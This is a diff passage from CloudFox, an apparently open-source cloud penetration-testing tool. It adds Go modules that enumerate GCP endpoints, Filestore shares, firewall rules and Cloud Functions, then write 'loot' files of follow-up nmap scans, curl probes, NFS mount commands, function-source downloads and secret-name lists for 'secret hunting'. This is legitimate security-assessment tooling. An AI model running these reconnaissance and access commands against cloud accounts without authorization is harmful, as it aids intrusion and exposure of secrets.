+ case strings.Contains(ep.Port, ","): + nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, hostname) + case strings.Contains(ep.Port, "-"): + nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, hostname) + default: + nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, hostname) + } + + // Select appropriate loot file + lootKey := "endpoints-external-commands" + if !ep.IsExternal { + lootKey = "endpoints-internal-commands" + } + + m.LootMap[lootKey].Contents += fmt.Sprintf( + "# %s: %s (%s)\n"+ + "# Project: %s | Region: %s | Network: %s\n"+ + "%s\n\n", + ep.Type, ep.Name, ep.ResourceType, + ep.ProjectID, ep.Region, ep.Network, + nmapCmd, + ) + + // Add HTTP/HTTPS test for web-facing endpoints + if ep.Type == "LoadBalancer" || ep.Type == "Global LoadBalancer" || ep.Type == "Cloud Run" { + if ep.TLSEnabled || ep.Port == "443" { + m.LootMap[lootKey].Contents += fmt.Sprintf("curl -vk https://%s/\n\n", hostname) + } else { + m.LootMap[lootKey].Contents += fmt.Sprintf("curl -v http://%s/\n\n", hostname) + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Status column shows operational state: RUNNING, STOPPED, IN_USE, RESERVED, etc. + header := []string{ + "Project ID", + "Project Name", + "Name", + "Type", + "IP Address", + "Hostname", + "Protocol", + "Port", + "Region", + "Network", + "Status", + } + + // External endpoints table + var externalBody [][]string + for _, ep := range m.ExternalEndpoints { + ipAddr, hostname := getIPAndHostname(ep) + externalBody = append(externalBody, []string{ + ep.ProjectID, + m.GetProjectName(ep.ProjectID), + ep.Name, + ep.Type, + ipAddr, + hostname, + ep.Protocol, + ep.Port, + ep.Region, + ep.Network, + ep.Status, + }) + } + + // Internal endpoints table + var internalBody [][]string + for _, ep := range m.InternalEndpoints { + ipAddr, hostname := getIPAndHostname(ep) + internalBody = append(internalBody, []string{ + ep.ProjectID, + m.GetProjectName(ep.ProjectID), + ep.Name, + ep.Type, + ipAddr, + hostname, + ep.Protocol, + ep.Port, + ep.Region, + ep.Network, + ep.Status, + }) + } + + // Firewall rules table (public 0.0.0.0/0 rules only) + var fwBody [][]string + if len(m.FirewallRules) > 0 { + for _, fw := range m.FirewallRules { + tags := strings.Join(fw.TargetTags, ",") + if tags == "" { + tags = "ALL" + } + fwBody = append(fwBody, []string{ + fw.ProjectID, + m.GetProjectName(fw.ProjectID), + fw.RuleName, + fw.Network, + fw.Protocol, + strings.Join(fw.Ports, ","), + tags, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + var tables []internal.TableFile + + if len(externalBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "endpoints-external", + Header: header, + Body: externalBody, + }) + } + + if len(internalBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "endpoints-internal", + Header: header, + Body: internalBody, + }) + } + + if len(fwBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "endpoints-firewall", + Header: []string{ + "Project ID", + "Project Name", + "Rule", + "Network", + "Protocol", + "Ports", + "Target Tags", + }, + Body: fwBody, + }) + } + + output := EndpointsOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "exposure") + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/filestore.go b/gcp/commands/filestore.go new file mode 100644 index 00000000..23dd7334 --- /dev/null +++ b/gcp/commands/filestore.go @@ -0,0 +1,190 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + filestoreservice "github.com/BishopFox/cloudfox/gcp/services/filestoreService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFilestoreCommand = &cobra.Command{ + Use: globals.GCP_FILESTORE_MODULE_NAME, + Aliases: []string{"nfs", "files"}, + Short: "Enumerate Filestore NFS instances", + Long: `Enumerate Filestore instances and their file shares.`, + Run: runGCPFilestoreCommand, +} + +type FilestoreModule struct { + gcpinternal.BaseGCPModule + Instances []filestoreservice.FilestoreInstanceInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type FilestoreOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FilestoreOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FilestoreOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPFilestoreCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FILESTORE_MODULE_NAME) + if err != nil { + return + } + + module := &FilestoreModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []filestoreservice.FilestoreInstanceInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *FilestoreModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FILESTORE_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 { + logger.InfoM("No Filestore instances found", globals.GCP_FILESTORE_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d Filestore instance(s)", len(m.Instances)), globals.GCP_FILESTORE_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *FilestoreModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + svc := filestoreservice.New() + instances, err := svc.ListInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FILESTORE_MODULE_NAME, + fmt.Sprintf("Could not enumerate Filestore instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.Instances = append(m.Instances, instances...) + for _, instance := range instances { + m.addToLoot(instance) + } + m.mu.Unlock() +} + +func (m *FilestoreModule) initializeLootFiles() { + m.LootMap["filestore-commands"] = &internal.LootFile{ + Name: "filestore-commands", + Contents: "# Filestore Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceInfo) { + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s\n", + instance.Name, instance.Location, + instance.ProjectID, + ) + + // gcloud command + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + "gcloud filestore instances describe %s --location=%s --project=%s\n", + instance.Name, instance.Location, instance.ProjectID, + ) + + // Mount commands for each share + if len(instance.Shares) > 0 && len(instance.IPAddresses) > 0 { + m.LootMap["filestore-commands"].Contents += "# Mount commands:\n" + for _, share := range instance.Shares { + for _, ip := range instance.IPAddresses { + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + "# Share: %s (%dGB)\n"+ + "mount -t nfs %s:/%s /mnt/%s\n", + share.Name, share.CapacityGB, + ip, share.Name, share.Name, + ) + } + } + } + + m.LootMap["filestore-commands"].Contents += "\n" +} + +func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "Tier", + "Network", + "IP", + "Shares", + "State", + } + + var body [][]string + for _, instance := range m.Instances { + var shareNames []string + for _, share := range instance.Shares { + shareNames = append(shareNames, share.Name) + } + + ip := strings.Join(instance.IPAddresses, ", ") + if ip == "" { + ip = "-" + } + + shares := strings.Join(shareNames, ", ") + if shares == "" { + shares = "-" + } + + network := instance.Network + if network == "" { + network = "-" + } + + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Location, + instance.Tier, + network, + ip, + shares, + instance.State, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := FilestoreOutput{ + Table: []internal.TableFile{{Name: "filestore", Header: header, Body: body}}, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) +} diff --git a/gcp/commands/firewall.go b/gcp/commands/firewall.go new file mode 100644 index 00000000..eb9d1acd --- /dev/null +++ b/gcp/commands/firewall.go @@ -0,0 +1,416 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + NetworkService "github.com/BishopFox/cloudfox/gcp/services/networkService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFirewallCommand = &cobra.Command{ + Use: globals.GCP_FIREWALL_MODULE_NAME, + Aliases: []string{"fw", "firewall-rules", "network-security"}, + Short: "Enumerate VPC networks and firewall rules with security analysis", + Long: `Enumerate VPC networks, subnets, and firewall rules across projects with security analysis. + +Features: +- Lists all VPC networks and their peering relationships +- Shows all subnets with CIDR ranges and configurations +- Enumerates firewall rules with security risk analysis +- Identifies overly permissive rules (0.0.0.0/0 ingress) +- Detects exposed sensitive ports (SSH, RDP, databases) +- Generates gcloud commands for remediation + +Security Columns: +- Risk: HIGH, MEDIUM, LOW based on exposure analysis +- Direction: INGRESS or EGRESS +- Source: Source IP ranges (0.0.0.0/0 = internet) +- Ports: Allowed ports and protocols +- Issues: Detected security misconfigurations + +Attack Surface: +- 0.0.0.0/0 ingress allows internet access to resources +- All ports allowed means no port restrictions +- No target tags means rule applies to ALL instances +- VPC peering may expose internal resources`, + Run: runGCPFirewallCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type FirewallModule struct { + gcpinternal.BaseGCPModule + + Networks []NetworkService.VPCInfo + Subnets []NetworkService.SubnetInfo + FirewallRules []NetworkService.FirewallRuleInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type FirewallOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FirewallOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FirewallOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPFirewallCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FIREWALL_MODULE_NAME) + if err != nil { + return + } + + module := &FirewallModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Networks: []NetworkService.VPCInfo{}, + Subnets: []NetworkService.SubnetInfo{}, + FirewallRules: []NetworkService.FirewallRuleInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *FirewallModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FIREWALL_MODULE_NAME, m.processProject) + + if len(m.FirewallRules) == 0 && len(m.Networks) == 0 { + logger.InfoM("No networks or firewall rules found", globals.GCP_FIREWALL_MODULE_NAME) + return + } + + // Count public ingress rules and peerings + publicIngressCount := 0 + for _, rule := range m.FirewallRules { + if rule.IsPublicIngress { + publicIngressCount++ + } + } + + peeringCount := 0 + for _, network := range m.Networks { + peeringCount += len(network.Peerings) + } + + msg := fmt.Sprintf("Found %d network(s), %d subnet(s), %d firewall rule(s)", + len(m.Networks), len(m.Subnets), len(m.FirewallRules)) + if publicIngressCount > 0 { + msg += fmt.Sprintf(" [%d public ingress]", publicIngressCount) + } + if peeringCount > 0 { + msg += fmt.Sprintf(" [%d peerings]", peeringCount) + } + logger.SuccessM(msg, globals.GCP_FIREWALL_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *FirewallModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating networks and firewall in project: %s", projectID), globals.GCP_FIREWALL_MODULE_NAME) + } + + ns := NetworkService.New() + + // Get networks + networks, err := ns.Networks(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate networks in project %s", projectID)) + } else { + m.mu.Lock() + m.Networks = append(m.Networks, networks...) + for _, network := range networks { + m.addNetworkToLoot(network) + } + m.mu.Unlock() + } + + // Get subnets + subnets, err := ns.Subnets(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate subnets in project %s", projectID)) + } else { + m.mu.Lock() + m.Subnets = append(m.Subnets, subnets...) + m.mu.Unlock() + } + + // Get firewall rules + rules, err := ns.FirewallRulesEnhanced(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate firewall rules in project %s", projectID)) + } else { + m.mu.Lock() + m.FirewallRules = append(m.FirewallRules, rules...) + for _, rule := range rules { + m.addFirewallRuleToLoot(rule) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d network(s), %d subnet(s), %d rule(s) in project %s", + len(networks), len(subnets), len(rules), projectID), globals.GCP_FIREWALL_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *FirewallModule) initializeLootFiles() { + m.LootMap["firewall-commands"] = &internal.LootFile{ + Name: "firewall-commands", + Contents: "# Firewall Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *FirewallModule) addNetworkToLoot(network NetworkService.VPCInfo) { + m.LootMap["firewall-commands"].Contents += fmt.Sprintf( + "# Network: %s\n"+ + "# Project: %s\n"+ + "gcloud compute networks describe %s --project=%s\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n"+ + "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n", + network.Name, network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + ) +} + +func (m *FirewallModule) addFirewallRuleToLoot(rule NetworkService.FirewallRuleInfo) { + m.LootMap["firewall-commands"].Contents += fmt.Sprintf( + "# Rule: %s (%s)\n"+ + "# Project: %s\n"+ + "gcloud compute firewall-rules describe %s --project=%s\n\n", + rule.Name, rule.Network, + rule.ProjectID, + rule.Name, rule.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Firewall rules table + rulesHeader := []string{ + "Project Name", + "Project ID", + "Rule Name", + "Network", + "Direction", + "Priority", + "Source Ranges", + "Allowed", + "Targets", + "Disabled", + "Logging", + } + + var rulesBody [][]string + for _, rule := range m.FirewallRules { + // Format source ranges - no truncation + sources := strings.Join(rule.SourceRanges, ", ") + if sources == "" { + sources = "-" + } + + // Format allowed protocols - no truncation + allowed := formatProtocols(rule.AllowedProtocols) + if allowed == "" { + allowed = "-" + } + + // Format targets - no truncation + targets := "-" + if len(rule.TargetTags) > 0 { + targets = strings.Join(rule.TargetTags, ", ") + } else if len(rule.TargetSAs) > 0 { + targets = strings.Join(rule.TargetSAs, ", ") + } else { + targets = "ALL" + } + + rulesBody = append(rulesBody, []string{ + m.GetProjectName(rule.ProjectID), + rule.ProjectID, + rule.Name, + rule.Network, + rule.Direction, + fmt.Sprintf("%d", rule.Priority), + sources, + allowed, + targets, + boolToYesNo(rule.Disabled), + boolToYesNo(rule.LoggingEnabled), + }) + } + + // Networks table + networksHeader := []string{ + "Project Name", + "Project ID", + "Network Name", + "Routing Mode", + "Subnets", + "Peerings", + "Auto Subnets", + } + + var networksBody [][]string + for _, network := range m.Networks { + // Count subnets + subnetCount := len(network.Subnetworks) + + // Format peerings - no truncation + peerings := "-" + if len(network.Peerings) > 0 { + var peerNames []string + for _, p := range network.Peerings { + peerNames = append(peerNames, p.Name) + } + peerings = strings.Join(peerNames, ", ") + } + + networksBody = append(networksBody, []string{ + m.GetProjectName(network.ProjectID), + network.ProjectID, + network.Name, + network.RoutingMode, + fmt.Sprintf("%d", subnetCount), + peerings, + boolToYesNo(network.AutoCreateSubnetworks), + }) + } + + // Subnets table + subnetsHeader := []string{ + "Project Name", + "Project ID", + "Network", + "Subnet Name", + "Region", + "CIDR Range", + "Private Google Access", + } + + var subnetsBody [][]string + for _, subnet := range m.Subnets { + subnetsBody = append(subnetsBody, []string{ + m.GetProjectName(subnet.ProjectID), + subnet.ProjectID, + subnet.Network, + subnet.Name, + subnet.Region, + subnet.IPCidrRange, + boolToYesNo(subnet.PrivateIPGoogleAccess), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(rulesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-rules", + Header: rulesHeader, + Body: rulesBody, + }) + } + + if len(networksBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-networks", + Header: networksHeader, + Body: networksBody, + }) + } + + if len(subnetsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-subnets", + Header: subnetsHeader, + Body: subnetsBody, + }) + } + + output := FirewallOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_FIREWALL_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// formatProtocols formats allowed/denied protocols for display +func formatProtocols(protocols map[string][]string) string { + var parts []string + for proto, ports := range protocols { + if len(ports) == 0 { + parts = append(parts, proto+":all") + } else { + parts = append(parts, proto+":"+strings.Join(ports, ",")) + } + } + return strings.Join(parts, "; ") +} + diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go new file mode 100644 index 00000000..51c2347e --- /dev/null +++ b/gcp/commands/functions.go @@ -0,0 +1,398 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + FunctionsService "github.com/BishopFox/cloudfox/gcp/services/functionsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFunctionsCommand = &cobra.Command{ + Use: globals.GCP_FUNCTIONS_MODULE_NAME, + Aliases: []string{"function", "gcf", "cloud-functions"}, + Short: "Enumerate GCP Cloud Functions with security analysis", + Long: `Enumerate GCP Cloud Functions across projects with security-relevant details. + +Features: +- Lists all Cloud Functions (Gen 2) accessible to the authenticated user +- Shows security configuration (ingress settings, VPC connector, service account) +- Identifies publicly invokable functions (allUsers/allAuthenticatedUsers) +- Shows runtime, trigger type, and trigger configuration +- Counts environment variables and secret references +- Generates gcloud commands for further enumeration and exploitation + +Security Columns: +- Ingress: ALL_TRAFFIC (public), INTERNAL_ONLY, or INTERNAL_AND_GCLB +- Public: Whether allUsers or allAuthenticatedUsers can invoke the function +- ServiceAccount: The identity the function runs as (privilege level) +- VPCConnector: Network connectivity to VPC resources +- Secrets: Count of secret environment variables and volumes + +Attack Surface: +- Public HTTP functions may be directly exploitable +- Functions with default service account may have excessive permissions +- Functions with VPC connectors can access internal resources +- Event triggers reveal integration points (Pub/Sub, Storage, etc.)`, + Run: runGCPFunctionsCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type FunctionsModule struct { + gcpinternal.BaseGCPModule + + Functions []FunctionsService.FunctionInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type FunctionsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FunctionsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FunctionsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPFunctionsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FUNCTIONS_MODULE_NAME) + if err != nil { + return + } + + module := &FunctionsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Functions: []FunctionsService.FunctionInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *FunctionsModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FUNCTIONS_MODULE_NAME, m.processProject) + + if len(m.Functions) == 0 { + logger.InfoM("No Cloud Functions found", globals.GCP_FUNCTIONS_MODULE_NAME) + return + } + + // Count public functions + publicCount := 0 + for _, fn := range m.Functions { + if fn.IsPublic { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d function(s), %d PUBLIC", len(m.Functions), publicCount), globals.GCP_FUNCTIONS_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d function(s)", len(m.Functions)), globals.GCP_FUNCTIONS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *FunctionsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Functions in project: %s", projectID), globals.GCP_FUNCTIONS_MODULE_NAME) + } + + fs := FunctionsService.New() + functions, err := fs.Functions(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FUNCTIONS_MODULE_NAME, + fmt.Sprintf("Could not enumerate functions in project %s", projectID)) + return + } + + m.mu.Lock() + m.Functions = append(m.Functions, functions...) + + for _, fn := range functions { + m.addFunctionToLoot(fn) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d function(s) in project %s", len(functions), projectID), globals.GCP_FUNCTIONS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *FunctionsModule) initializeLootFiles() { + m.LootMap["functions-commands"] = &internal.LootFile{ + Name: "functions-commands", + Contents: "# GCP Cloud Functions Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["functions-env-vars"] = &internal.LootFile{ + Name: "functions-env-vars", + Contents: "# Cloud Functions Environment Variables\n# Generated by CloudFox\n# Variable names that may hint at secrets\n\n", + } + m.LootMap["functions-secrets"] = &internal.LootFile{ + Name: "functions-secrets", + Contents: "# Cloud Functions Secret References\n# Generated by CloudFox\n# Secrets used by functions (names only)\n\n", + } +} + +func (m *FunctionsModule) addFunctionToLoot(fn FunctionsService.FunctionInfo) { + // All commands for this function + m.LootMap["functions-commands"].Contents += fmt.Sprintf( + "## Function: %s (Project: %s, Region: %s)\n"+ + "# Runtime: %s, Trigger: %s\n"+ + "# Service Account: %s\n"+ + "# Public: %v, Ingress: %s\n", + fn.Name, fn.ProjectID, fn.Region, + fn.Runtime, fn.TriggerType, + fn.ServiceAccount, + fn.IsPublic, fn.IngressSettings, + ) + + if fn.TriggerURL != "" { + m.LootMap["functions-commands"].Contents += fmt.Sprintf("# URL: %s\n", fn.TriggerURL) + } + + if fn.SourceLocation != "" { + m.LootMap["functions-commands"].Contents += fmt.Sprintf("# Source: %s (%s)\n", fn.SourceLocation, fn.SourceType) + } + + m.LootMap["functions-commands"].Contents += fmt.Sprintf( + "\n# Describe function:\n"+ + "gcloud functions describe %s --region=%s --project=%s --gen2\n"+ + "# Get IAM policy:\n"+ + "gcloud functions get-iam-policy %s --region=%s --project=%s --gen2\n"+ + "# Read logs:\n"+ + "gcloud functions logs read %s --region=%s --project=%s --gen2 --limit=50\n", + fn.Name, fn.Region, fn.ProjectID, + fn.Name, fn.Region, fn.ProjectID, + fn.Name, fn.Region, fn.ProjectID, + ) + + // HTTP invocation commands + if fn.TriggerType == "HTTP" && fn.TriggerURL != "" { + m.LootMap["functions-commands"].Contents += fmt.Sprintf( + "# Invoke (GET):\n"+ + "curl -s '%s'\n"+ + "# Invoke (POST with auth):\n"+ + "curl -s -X POST '%s' \\\n"+ + " -H 'Authorization: Bearer $(gcloud auth print-identity-token)' \\\n"+ + " -H 'Content-Type: application/json' \\\n"+ + " -d '{\"test\": \"data\"}'\n", + fn.TriggerURL, + fn.TriggerURL, + ) + } + + // Source download command + if fn.SourceType == "GCS" && fn.SourceLocation != "" { + m.LootMap["functions-commands"].Contents += fmt.Sprintf( + "# Download source:\n"+ + "gsutil cp %s ./function-source-%s.zip\n", + fn.SourceLocation, fn.Name, + ) + } + + m.LootMap["functions-commands"].Contents += "\n" + + // Environment variable names (keep separate - useful for secret hunting) + if len(fn.EnvVarNames) > 0 { + m.LootMap["functions-env-vars"].Contents += fmt.Sprintf( + "## Function: %s (Project: %s)\n", + fn.Name, fn.ProjectID, + ) + for _, varName := range fn.EnvVarNames { + m.LootMap["functions-env-vars"].Contents += fmt.Sprintf("## - %s\n", varName) + } + m.LootMap["functions-env-vars"].Contents += "\n" + } + + // Secret references (keep separate - useful for secret hunting) + if len(fn.SecretEnvVarNames) > 0 || len(fn.SecretVolumeNames) > 0 { + m.LootMap["functions-secrets"].Contents += fmt.Sprintf( + "## Function: %s (Project: %s)\n", + fn.Name, fn.ProjectID, + ) + if len(fn.SecretEnvVarNames) > 0 { + m.LootMap["functions-secrets"].Contents += "## Secret Environment Variables:\n" + for _, secretName := range fn.SecretEnvVarNames { + m.LootMap["functions-secrets"].Contents += fmt.Sprintf("## - %s\n", secretName) + } + } + if len(fn.SecretVolumeNames) > 0 { + m.LootMap["functions-secrets"].Contents += "## Secret Volumes:\n" + for _, volName := range fn.SecretVolumeNames { + m.LootMap["functions-secrets"].Contents += fmt.Sprintf("## - %s\n", volName) + } + } + m.LootMap["functions-secrets"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Functions table with one row per IAM binding + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "State", + "Runtime", + "Trigger", + "URL", + "Ingress", + "Public", + "Service Account", + "VPC Connector", + "Secrets", + "IAM Role", + "IAM Member", + } + + var body [][]string + for _, fn := range m.Functions { + // Format trigger info + triggerInfo := fn.TriggerType + if fn.TriggerEventType != "" { + triggerInfo = fn.TriggerType + } + + // Format URL - no truncation + url := "-" + if fn.TriggerURL != "" { + url = fn.TriggerURL + } + + // Format VPC connector + vpcConnector := "-" + if fn.VPCConnector != "" { + vpcConnector = fn.VPCConnector + } + + // Format secrets count + secretsInfo := "-" + totalSecrets := fn.SecretEnvVarCount + fn.SecretVolumeCount + if totalSecrets > 0 { + secretsInfo = fmt.Sprintf("%d", totalSecrets) + } + + // Format service account - no truncation + serviceAccount := fn.ServiceAccount + if serviceAccount == "" { + serviceAccount = "-" + } + + // If function has IAM bindings, create one row per binding + if len(fn.IAMBindings) > 0 { + for _, binding := range fn.IAMBindings { + body = append(body, []string{ + m.GetProjectName(fn.ProjectID), + fn.ProjectID, + fn.Name, + fn.Region, + fn.State, + fn.Runtime, + triggerInfo, + url, + fn.IngressSettings, + boolToYesNo(fn.IsPublic), + serviceAccount, + vpcConnector, + secretsInfo, + binding.Role, + binding.Member, + }) + } + } else { + // Function has no IAM bindings - single row + body = append(body, []string{ + m.GetProjectName(fn.ProjectID), + fn.ProjectID, + fn.Name, + fn.Region, + fn.State, + fn.Runtime, + triggerInfo, + url, + fn.IngressSettings, + boolToYesNo(fn.IsPublic), + serviceAccount, + vpcConnector, + secretsInfo, + "-", + "-", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + if len(body) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FUNCTIONS_MODULE_NAME, + Header: header, + Body: body, + }) + } + + output := FunctionsOutput{ + Table: tableFiles, + Loot: lootFiles, 